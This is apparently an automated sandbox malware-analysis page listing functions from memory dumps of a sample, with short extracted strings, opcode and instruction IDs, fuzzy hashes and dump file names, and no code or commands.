Opcode ID: 8f11379e9f5da3686c670748926b93a19e55d1189e69eb2577bbd794f9e5e048
Instruction ID: 5388aebb9722ef47512ed6758712c035957564ba8f43e3dcaa493907b87915b9
Opcode Fuzzy Hash: 8f11379e9f5da3686c670748926b93a19e55d1189e69eb2577bbd794f9e5e048
Instruction Fuzzy Hash: 5FC12AB5D40212CBCB24CF69CC916BBB7B1FF95310F19825DD896AB390E738A841CB94

Function 00428BE9 Relevance: 1.7, Strings: 1, Instructions: 426COMMON

Download Yara Rule

Strings

H, xrefs: 004290E3

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: H
API String ID: 0-2852464175
Opcode ID: f90cc14d5b1d07471296a569d27c41b333f7458cf0fcf530a90d726fe5722012
Instruction ID: 0c29c4f326a3360d4f83cd19facfb249d1e6e8dcfa8d7f8eb9091c930c4cf0c7
Opcode Fuzzy Hash: f90cc14d5b1d07471296a569d27c41b333f7458cf0fcf530a90d726fe5722012
Instruction Fuzzy Hash: 69D17634B05254CFDB14CF78E8D16AEBBB2AF1A310F6841BDE5519B392CB384906CB59

Function 00421D10 Relevance: 1.7, Strings: 1, Instructions: 425COMMON

Download Yara Rule

Strings

&#, xrefs: 00421D7D

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: &#
API String ID: 0-1789715784
Opcode ID: de53aefd5a1aa7a3c6e7ceeff6aeff0c51e7fefa1ef74132f5b7c443d7941a72
Instruction ID: c9f534a10d10fcbb0aeeb65dde57b2602cc7be5083ad25e1a4bd69b4b534b867
Opcode Fuzzy Hash: de53aefd5a1aa7a3c6e7ceeff6aeff0c51e7fefa1ef74132f5b7c443d7941a72
Instruction Fuzzy Hash: 6FA14B71B042205BD7249B289C5267BB3E1EFA1324F89852EF896973D1E77CED01C35A

Function 009D1F77 Relevance: 1.7, Strings: 1, Instructions: 425COMMON

Download Yara Rule

Strings

&#, xrefs: 009D1FE4

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: &#
API String ID: 0-1789715784
Opcode ID: 0f12d66f6b808d20c475992f0f687e3f453dd6e3f6f88e05d52d4cafb9cead41
Instruction ID: 6e3e1895dde2389d6cfd223f011cf3862a356194f6fe719a71f4107ea6706957
Opcode Fuzzy Hash: 0f12d66f6b808d20c475992f0f687e3f453dd6e3f6f88e05d52d4cafb9cead41
Instruction Fuzzy Hash: 3DA128726482105BD7189B28CC9367BB3E9EFA1320F09C92DF99697391E734ED05C752

Function 0041CB05 Relevance: 1.7, Strings: 1, Instructions: 407COMMON

Download Yara Rule

Strings

. , xrefs: 0041CBA7

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: .
API String ID: 0-1505114982
Opcode ID: 5d6aea454a76d2159c148964020a4ba4746a54c1e6cbfad0a7af44267aa07dc3
Instruction ID: df86e8cabfd52562b6ebe50b702b66c3677f2f48fb8aab21b174fbacb2a831e7
Opcode Fuzzy Hash: 5d6aea454a76d2159c148964020a4ba4746a54c1e6cbfad0a7af44267aa07dc3
Instruction Fuzzy Hash: 8AB1F4B5E402128BCB248F68CC927A7B7B1FF55314F19915ED845AB790E738AC42C7D4

Function 009B83C7 Relevance: 1.6, Strings: 1, Instructions: 399COMMON

Download Yara Rule

Strings

-, xrefs: 009B84EC

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 27c89adea84a4971459812ff31a4728146f694fcb44008b8af47e8cd9ff8a59b
Instruction ID: 81bffc942ab753ca466c029d00066777644a3a57d9e91c86f9153b0de951c402
Opcode Fuzzy Hash: 27c89adea84a4971459812ff31a4728146f694fcb44008b8af47e8cd9ff8a59b
Instruction Fuzzy Hash: F6D1FC71A083458BC7188E29C9D02AFBBDBABD5334F188A1DE4E5473D5DB389905CB81

Function 00409700 Relevance: 1.6, Strings: 1, Instructions: 351COMMON

Download Yara Rule

Strings

5A840351CDC61B5EF9F1B7136A1E0C5E, xrefs: 004097D3

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: 5A840351CDC61B5EF9F1B7136A1E0C5E
API String ID: 0-3284871579
Opcode ID: ff3731471c5a2191c5a05658faba6c42204445524e7f8331b46cc9c8e8b982bc
Instruction ID: 2e87a28a76dba4f31cae47dba0fb7e22e1a8f98f0dc0d4366023ba0889080103
Opcode Fuzzy Hash: ff3731471c5a2191c5a05658faba6c42204445524e7f8331b46cc9c8e8b982bc
Instruction Fuzzy Hash: 35C105716083808BD318DF35C85066BBBE6EBD2314F14893DE4D697392DB39C90ACB56

Function 009CC528 Relevance: 1.6, Strings: 1, Instructions: 342COMMON

Download Yara Rule

Strings

de, xrefs: 009CC5B4

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: de
API String ID: 0-2106599819
Opcode ID: 859681f232736f0ad411de2e9c44a8bd8c96edd644b44a10bf2b24b8f8322015
Instruction ID: ebdacc35ed15d0293f9b14ee19f442858dd0697431b2d59372589ae04a1c336e
Opcode Fuzzy Hash: 859681f232736f0ad411de2e9c44a8bd8c96edd644b44a10bf2b24b8f8322015
Instruction Fuzzy Hash: FC9133B19083118BC324DF28C892B6BBBF2EFD5364F18992CE4DA4B391E7789505C752

Function 0041D270 Relevance: 1.6, Strings: 1, Instructions: 327COMMON

Download Yara Rule

Strings

~, xrefs: 0041D33B

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: ~
API String ID: 0-1707062198
Opcode ID: 717fb99ad837fa00688aa9d47cfa2cea6a0f0870295f069540f30f335af8ffc8
Instruction ID: fb8d2d24bbcf8da77d425a74861fbc6d37f4fcabb9a6f9815e5d7f96e75daac0
Opcode Fuzzy Hash: 717fb99ad837fa00688aa9d47cfa2cea6a0f0870295f069540f30f335af8ffc8
Instruction Fuzzy Hash: E2A14772E042215FCB15CE2888806ABB7D1ABD5324F19823EECB99B3D2D634DD0697D1

Function 009CD4D7 Relevance: 1.6, Strings: 1, Instructions: 327COMMON

Download Yara Rule

Strings

~, xrefs: 009CD5A2

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: ~
API String ID: 0-1707062198
Opcode ID: 0586b10d706dca5a64b5c4dddf8e23f91b5afc25d5560ad33649bb62161a3210
Instruction ID: 79f563ef1976564ef8c77f25956d5603e7e142d772a2204bbff0256caa187d83
Opcode Fuzzy Hash: 0586b10d706dca5a64b5c4dddf8e23f91b5afc25d5560ad33649bb62161a3210
Instruction Fuzzy Hash: F3A14872E082614FC725CE288C80B6AB7E1AFD5320F19823DECA98B3D1D6348D06D7D1

Function 00426E50 Relevance: 1.6, Strings: 1, Instructions: 326COMMON

Download Yara Rule

Strings

RpB, xrefs: 00426FEB

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: RpB
API String ID: 0-664042118
Opcode ID: d81e78c847e0577fff4fe054f0d5c7df3a35ca67ad11338b1f5183c552fb7e2c
Instruction ID: f37ba1eb55105a71e6c02689e7a75f224f26334d47d5f70d86fb510902375083
Opcode Fuzzy Hash: d81e78c847e0577fff4fe054f0d5c7df3a35ca67ad11338b1f5183c552fb7e2c
Instruction Fuzzy Hash: 09B12532A0C391CFD314CF28E89072AB7E2BF8A711F1A4A6DE59597391C7349D45CB4A

Function 004252BA Relevance: 1.6, Strings: 1, Instructions: 303COMMON

Download Yara Rule

Strings

d1, xrefs: 004254D0

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: d1
API String ID: 0-4211392460
Opcode ID: 3a09c18315f27601645beb0ad486dee07da92b92439b4458714023d4f5bac47a
Instruction ID: 74c04020a71521c8b9984734295d0b81cdc6df3862d17ec890c7cf8b211da757
Opcode Fuzzy Hash: 3a09c18315f27601645beb0ad486dee07da92b92439b4458714023d4f5bac47a
Instruction Fuzzy Hash: 409112B5618200DFD714DF24E881A7BB7A0FB8A705F84593EF48693361DB38C9158B4A

Function 0043D830 Relevance: 1.5, Strings: 1, Instructions: 299COMMON

Download Yara Rule

Strings

cdef, xrefs: 0043D895

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: cdef
API String ID: 2994545307-4216504194
Opcode ID: 6bc07d34d1d6b00cc4b19fb39e7543bc3ba7a18e64985db278588bca8b02e99b
Instruction ID: d704160fc5b89d86d9794d8a66ae716d782a0973953182dc9c1641cf0cee7e05
Opcode Fuzzy Hash: 6bc07d34d1d6b00cc4b19fb39e7543bc3ba7a18e64985db278588bca8b02e99b
Instruction Fuzzy Hash: 30815471A083108FC718DF24E88096BBBA2EFDA310F19993DE9D557352C735AC05C786

Function 009EDA97 Relevance: 1.5, Strings: 1, Instructions: 299COMMON

Download Yara Rule

Strings

cdef, xrefs: 009EDAFC

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: cdef
API String ID: 0-4216504194
Opcode ID: 6cfb0631b4c3af94e0a4d7ca533938db559d7b6d0bfe02f92feebc81ba876585
Instruction ID: a8e31c936283dcbc1115edee4d59993ec551a1bdeecbfe6e9f7009eae3b576be
Opcode Fuzzy Hash: 6cfb0631b4c3af94e0a4d7ca533938db559d7b6d0bfe02f92feebc81ba876585
Instruction Fuzzy Hash: 77815631A093908FC726CF25C890A7BBBA5EFD6710F298A3CE9D557291D731AC41C792

Function 009C734A Relevance: 1.5, Strings: 1, Instructions: 274COMMON

Download Yara Rule

Strings

gfff, xrefs: 009C7559

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: gfff
API String ID: 0-1553575800
Opcode ID: c5d9ff75fed77c201b8d14b3cc3b758706ca82fef0a51ed8aa8899dc59fb4eb5
Instruction ID: 3e6a4da8900f17c8ba732ef557d9c8deea5bf6aceaf359b122e89298792d1a5c
Opcode Fuzzy Hash: c5d9ff75fed77c201b8d14b3cc3b758706ca82fef0a51ed8aa8899dc59fb4eb5
Instruction Fuzzy Hash: E1910371614B428FD318CF78C851BA6B7D2EB95314F18C53DD096CB7A6DA78E442CB41

Function 009C77E9 Relevance: 1.5, Strings: 1, Instructions: 269COMMON

Download Yara Rule

Strings

c$, xrefs: 009C796E

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: c$
API String ID: 0-2516980088
Opcode ID: bc3c15472f07d559a5396f8094059b7ab067923e86a285eaa48d66e2478d2574
Instruction ID: 553ac0c2af241d04359901c379c53521a8adec9b5440fdd620b5bbc0ebe466d8
Opcode Fuzzy Hash: bc3c15472f07d559a5396f8094059b7ab067923e86a285eaa48d66e2478d2574
Instruction Fuzzy Hash: 5F9198B0504741CFD7648F25C4A4B62BBB1FF46318F19958CC4864FBA1E379A846CF95

Function 0042B12C Relevance: 1.5, Strings: 1, Instructions: 268COMMON

Download Yara Rule

Strings

Fg, xrefs: 0042B257

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: Fg
API String ID: 0-875302535
Opcode ID: cec98c6035f8278796335b79b8fe425f66d685e3fc2c40d87c06063720ff0d23
Instruction ID: 81bd39487229f81fa75b1a19b8121f8c05985a2d1a0f7b16a24bef680633e699
Opcode Fuzzy Hash: cec98c6035f8278796335b79b8fe425f66d685e3fc2c40d87c06063720ff0d23
Instruction Fuzzy Hash: 6F81E47121D3808BE768CF25C8657ABBBD2EBD2304F58896DC1C987392DB38440ACB56

Function 009DB393 Relevance: 1.5, Strings: 1, Instructions: 268COMMON

Download Yara Rule

Strings

Fg, xrefs: 009DB4BE

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: Fg
API String ID: 0-875302535
Opcode ID: 42a71ed4ddc16415858e4dfc4422956aad04ddc95995e0a2601de5add053e1e2
Instruction ID: 5716e93f0ee3f15b8a1464a5e752434b306c91226be78595c5fb55db2d5ff7ca
Opcode Fuzzy Hash: 42a71ed4ddc16415858e4dfc4422956aad04ddc95995e0a2601de5add053e1e2
Instruction Fuzzy Hash: 2881D47121D3808AD769CF25C8617BABBD6EBD2314F19C96DD1C98B392DB38440ACB16

Function 00405EB0 Relevance: 1.5, Strings: 1, Instructions: 265COMMON

Download Yara Rule

Strings

,, xrefs: 00405FE6

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: 735cee050c0adee449850ba2ce1bb04225bd749ef176fa0d293106b9e62c3734
Instruction ID: 6b9defcb35fa499ff27616791264c6e5e8496363bec20089c87d7e70d31ec12b
Opcode Fuzzy Hash: 735cee050c0adee449850ba2ce1bb04225bd749ef176fa0d293106b9e62c3734
Instruction Fuzzy Hash: 72B136701087819FC321CF18C88061BBBE0AFA9704F444E6EF5D997382D635E918CBA7

Function 009B6117 Relevance: 1.5, Strings: 1, Instructions: 265COMMON

Download Yara Rule

Strings

,, xrefs: 009B624D

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: 735cee050c0adee449850ba2ce1bb04225bd749ef176fa0d293106b9e62c3734
Instruction ID: 03a1073e4bb10255fdff270fa6e832612e704065d27fd43854e6943350329675
Opcode Fuzzy Hash: 735cee050c0adee449850ba2ce1bb04225bd749ef176fa0d293106b9e62c3734
Instruction Fuzzy Hash: 73B1477020C3819FD321CF18C98065BFBE1AFA9704F484E2DE5D997382D635E918CBA6

Function 0041B0E1 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

js{g, xrefs: 0041B34C

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: js{g
API String ID: 0-1014319796
Opcode ID: 9c18fcfdf183d3e6e2325b026543344db9fcf0b9b7ccceb31fbfaeb5f3b5c64c
Instruction ID: 14be18684298a51b6f1365b8eea6b5aba3066a4a8cfe6059be97ad669d3f7baa
Opcode Fuzzy Hash: 9c18fcfdf183d3e6e2325b026543344db9fcf0b9b7ccceb31fbfaeb5f3b5c64c
Instruction Fuzzy Hash: FF815671650B804BE7398F35C8517ABBBE2AB56718F08895DD4D39BB85C378E406CB44

Function 009CB348 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

js{g, xrefs: 009CB5B3

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: js{g
API String ID: 0-1014319796
Opcode ID: 2bedd816319602fe80fa94cf924704a6c11e2863fdffa8fa3602250936590e55
Instruction ID: 815c69dcab14e796bb29794a6137114f6e582993fef173a156e99a01fdfddfa9
Opcode Fuzzy Hash: 2bedd816319602fe80fa94cf924704a6c11e2863fdffa8fa3602250936590e55
Instruction Fuzzy Hash: 90815971655B804BE7398F35C852BABBBE2AB52718F08895CD1C39BF95C378E406CB00

Function 0041714B Relevance: 1.5, Strings: 1, Instructions: 263COMMON

Download Yara Rule

Strings

gfff, xrefs: 004172F2

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: gfff
API String ID: 2994545307-1553575800
Opcode ID: 09c846a2afc331d85edad14330251619ebe1679237f5647bd4b68f37056fbcaf
Instruction ID: c6a45f7a1688543314b9a3a30fef6f223fff4d1289bb41df6adbe344278a34bf
Opcode Fuzzy Hash: 09c846a2afc331d85edad14330251619ebe1679237f5647bd4b68f37056fbcaf
Instruction Fuzzy Hash: 0F81D2717147418FD325CB39CC50BA6BBE2AB95308F18C57ED096CB7A6EA78A842C744

Function 0043D2F0 Relevance: 1.5, Strings: 1, Instructions: 247COMMON

Download Yara Rule

Strings

ihgf, xrefs: 0043D315

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: ihgf
API String ID: 2994545307-2948842496
Opcode ID: cdcb811f3b6eb00ba9c047de99187d2b4a3705ee1c65ea447f98f9511ad803bb
Instruction ID: 39294a001ccb7b60b57bd072fead094b817a0247c43ae1e4845dbb8435dacfda
Opcode Fuzzy Hash: cdcb811f3b6eb00ba9c047de99187d2b4a3705ee1c65ea447f98f9511ad803bb
Instruction Fuzzy Hash: 5B81C274A04201AFD714CF28E881A6BB7F2FF99314F15A52DE5858B3A1DB35EC11CB46

Function 009ED557 Relevance: 1.5, Strings: 1, Instructions: 247COMMON

Download Yara Rule

Strings

ihgf, xrefs: 009ED57C

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: ihgf
API String ID: 0-2948842496
Opcode ID: eef0a356b23e55d2308e20bed1a6a7dcd73da6f3f0547914f9e2b30739e3ef6c
Instruction ID: 6ce22bb833b7a17d532f74574723507dfb4bf7b836df6db0009a3bb50cfcc333
Opcode Fuzzy Hash: eef0a356b23e55d2308e20bed1a6a7dcd73da6f3f0547914f9e2b30739e3ef6c
Instruction Fuzzy Hash: 2181C0746052419FD716DF29C880A2BB7F6EFD9714F19862CE5848B3A1DB32EC40CB42

Function 009C73B2 Relevance: 1.5, Strings: 1, Instructions: 244COMMON

Download Yara Rule

Strings

gfff, xrefs: 009C7559

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: gfff
API String ID: 0-1553575800
Opcode ID: de86720abe9662384bfc4389f4b275199587a53d7c35c6b33b3c21993df62823
Instruction ID: 10996bdd68a93bd1dbc0b49261172d970d7f382638a18ed0a8090a515bcf7e6d
Opcode Fuzzy Hash: de86720abe9662384bfc4389f4b275199587a53d7c35c6b33b3c21993df62823
Instruction Fuzzy Hash: 0571F271A14B418FD318CF79C850BA6BBD2AB95314F18C57DC096CB7A2EA78E842CB41

Function 0042A3D0 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

", xrefs: 0042A5CE

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction ID: 4b2f630bb6a68757ad0504ce5be77257e5761d12b45ca5ba0373d51c8e5240e3
Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction Fuzzy Hash: 22710532B083259BD714CE28E88431BB7E2ABC5710F99852EEC948B391D379DC55878B

Function 009DA637 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

", xrefs: 009DA835

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction ID: 8e025b568748dd8f535b9652bfb037a852d2f94a36811fef9da9f3f6e1f7ede4
Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction Fuzzy Hash: 9E711232A883158FD7148E28C88031EBBE6ABC5750F69C92FE8949B390D335DD559B87

Function 00424502 Relevance: 1.5, Strings: 1, Instructions: 232COMMON

Download Yara Rule

Strings

DB, xrefs: 00424795

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: DB
API String ID: 0-3908451873
Opcode ID: b5d81c37cb7d393257c23fd21a2bc174357223c4d1b28a71c8bcec52b0dc5dc8
Instruction ID: 63fe74dcdf674bdd3faef37b2e0283437cd793175f1af46cf0498e51130e9ee1
Opcode Fuzzy Hash: b5d81c37cb7d393257c23fd21a2bc174357223c4d1b28a71c8bcec52b0dc5dc8
Instruction Fuzzy Hash: A381B67AF04225CBCB18CF64D8905AEB7B2FFDA710F59806AC841AB355DB349D42CB54

Function 00424A74 Relevance: 1.5, Strings: 1, Instructions: 206COMMON

Download Yara Rule

Strings

LB, xrefs: 00424CE6

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: LB
API String ID: 0-539997225
Opcode ID: d02495da20a3f8a7219353459d550f72d20704d827e4251e17801bf690faaf74
Instruction ID: 190c79d128488961cfb389f9b0ffad8fedd0031ada35975bf34f4c17adb32e46
Opcode Fuzzy Hash: d02495da20a3f8a7219353459d550f72d20704d827e4251e17801bf690faaf74
Instruction Fuzzy Hash: D1618E31B412228BDB18CF29E8A12FBFBE2EF91310B58466ED4574B3C1D7389941D799

Function 0041DD50 Relevance: 1.4, Strings: 1, Instructions: 199COMMON

Download Yara Rule

Strings

Y*>, xrefs: 0041DD54

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: Y*>
API String ID: 0-3862480330
Opcode ID: 22b3804befe7f91e84aca949ffb80fce2ed22dd13d93b44656185de14de2ea60
Instruction ID: 90e50e1672eaf7fe8d97f2f09bdb4033b3ef25f85dbdb073c688402916a0328e
Opcode Fuzzy Hash: 22b3804befe7f91e84aca949ffb80fce2ed22dd13d93b44656185de14de2ea60
Instruction Fuzzy Hash: 4C510573F499814BD72C893C5C223EAAA834BD6234B2DD77BE4B2CB3E4D5698C464345

Function 009CDFB7 Relevance: 1.4, Strings: 1, Instructions: 199COMMON

Download Yara Rule

Strings

Y*>, xrefs: 009CDFBB

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: Y*>
API String ID: 0-3862480330
Opcode ID: 22b3804befe7f91e84aca949ffb80fce2ed22dd13d93b44656185de14de2ea60
Instruction ID: 213e4fc9ac98c2405767c9adbbacbb1694fbdfb50fbe7b41206ee74c52d9cbd2
Opcode Fuzzy Hash: 22b3804befe7f91e84aca949ffb80fce2ed22dd13d93b44656185de14de2ea60
Instruction Fuzzy Hash: E751C233F5D9814BE72C893C5C227AAAA834BD6234B2DC77ED4B2CB3E5D5A94C054342

